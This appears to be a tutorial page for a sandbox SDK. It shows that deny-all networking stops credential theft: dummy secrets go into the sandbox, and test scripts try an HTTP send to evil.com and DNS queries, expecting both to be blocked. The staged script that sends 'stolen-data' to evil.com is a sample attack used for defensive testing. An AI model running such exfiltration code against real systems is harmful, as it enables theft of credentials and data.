What You’ll Learn

  • Creating a sandbox with allow_internet_access=False to block all outbound traffic
  • Writing sensitive data (API keys, passwords) into the sandbox
  • Confirming HTTP exfiltration attempts are blocked
  • Understanding why DNS exfiltration is also prevented by deny-all
  • Verifying the data remains accessible locally within the sandbox

Scenario

An AI agent processes sensitive data (credentials, API keys) inside a sandbox. Even if the code is compromised or malicious, deny-all networking ensures it cannot exfiltrate data:
  1. Sensitive data is written into the sandbox
  2. Malicious code tries to POST the data to evil.com: blocked
  3. DNS-based exfiltration (encoding data in DNS queries) is also impossible
  4. The data can still be read locally for legitimate processing

Prerequisites

This example is available in Python. TypeScript version coming soon.

Code Walkthrough

Create a sandbox with all outbound traffic denied:

from declaw import Sandbox

sbx = Sandbox.create(
    template="python", timeout=300, allow_internet_access=False
)

Write simulated credentials into the sandbox:

sbx.files.write(
    "/tmp/secrets.txt",
    "API_KEY=sk-secret-12345\nDB_PASSWORD=hunter2\n",
)
print("  Wrote /tmp/secrets.txt with simulated credentials.")

Attempt to exfiltrate via HTTP — the connection is blocked:

EXFIL_SCRIPT = """
import socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect(("93.184.216.34", 80))  # example.com IP
    s.sendall(b"POST / HTTP/1.1\\r\\nHost: evil.com\\r\\n\\r\\nstolen-data")
    s.close()
    print("EXFILTRATED")
except Exception as e:
    print(f"BLOCKED: {e}")
"""

sbx.files.write("/tmp/exfil_test.py", EXFIL_SCRIPT)
result = sbx.commands.run("python3 /tmp/exfil_test.py", timeout=15)
print(f"  Output: {result.stdout.strip()}")

if "BLOCKED" in result.stdout:
    print("  [PASS] Data exfiltration was blocked.")

DNS exfiltration is inherently blocked — no outbound packets can leave:

print("  With deny-all networking, DNS resolution is also blocked.")
print("  No outbound packets can leave the sandbox, so DNS-based")
print("  exfiltration (encoding data in DNS queries) is not possible.")
print("  [PASS] DNS exfiltration is inherently blocked by deny-all policy.")

Verify the data is still readable locally:

content = sbx.files.read("/tmp/secrets.txt")
print(f"  Content: {content.strip()}")

if "sk-secret-12345" in content:
    print("  [PASS] Data is accessible locally within the sandbox.")
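
The DNS step in the walkthrough states that resolution is blocked but does not test it. The script below is an added example, not part of the declaw documentation or SDK: an egress probe meant to run inside the sandbox that tries the system resolver and a direct UDP query to port 53. The resolver address 1.1.1.1, the query name example.com and all function names are choices made for this example.

```python
import socket
import struct


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Minimal DNS A-record query in RFC 1035 wire format."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, 1 question
    labels = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split("."))
    return header + labels + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def probe_udp_dns(server: str, port: int = 53, name: str = "example.com",
                  timeout: float = 3.0) -> str:
    """Send one query straight to a resolver IP, bypassing /etc/resolv.conf."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((server, port))
            s.send(build_query(name))
            s.recv(512)
        except OSError as e:  # timeout, unreachable, refused, EPERM
            return f"BLOCKED: {type(e).__name__}"
    return "REACHABLE"  # any reply means a packet left and came back


def probe_system_resolver(name: str = "example.com") -> str:
    """Resolve through whatever resolver the sandbox image is configured with."""
    try:
        socket.getaddrinfo(name, 80)
    except OSError as e:  # socket.gaierror is a subclass of OSError
        return f"BLOCKED: {type(e).__name__}"
    return "REACHABLE"


def run_probes() -> dict:
    # 1.1.1.1 is a public resolver chosen for this example; any resolver IP works.
    return {
        "system_resolver": probe_system_resolver(),
        "udp_53_direct": probe_udp_dns("1.1.1.1"),
    }


if __name__ == "__main__":
    for check, outcome in run_probes().items():
        print(f"{check}: {outcome}")
```

Written into the sandbox with sbx.files.write and run with sbx.commands.run, the same way as /tmp/exfil_test.py, both checks should report BLOCKED when allow_internet_access=False. Give the command a timeout long enough for the system resolver to give up, since getaddrinfo has no timeout of its own.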

Expected Output

============================================================
Network Exfiltration Prevention Example
============================================================

--- Creating sandbox with all outbound traffic DENIED ---
Sandbox created: sbx_abc123

--- Step 1: Writing sensitive data into sandbox ---
  Wrote /tmp/secrets.txt with simulated credentials.

--- Step 2: Attempting to exfiltrate data via network ---
  Output: BLOCKED: timed out
  [PASS] Data exfiltration was blocked.

--- Step 3: DNS exfiltration ---
  With deny-all networking, DNS resolution is also blocked.
  No outbound packets can leave the sandbox, so DNS-based
  exfiltration (encoding data in DNS queries) is not possible.
  [PASS] DNS exfiltration is inherently blocked by deny-all policy.

--- Step 4: Reading sensitive data locally (should work) ---
  Content: API_KEY=sk-secret-12345
           DB_PASSWORD=hunter2
  [PASS] Data is accessible locally within the sandbox.

--- Cleaning Up ---
  Sandbox sbx_abc123 killed.

============================================================
Done!
============================================================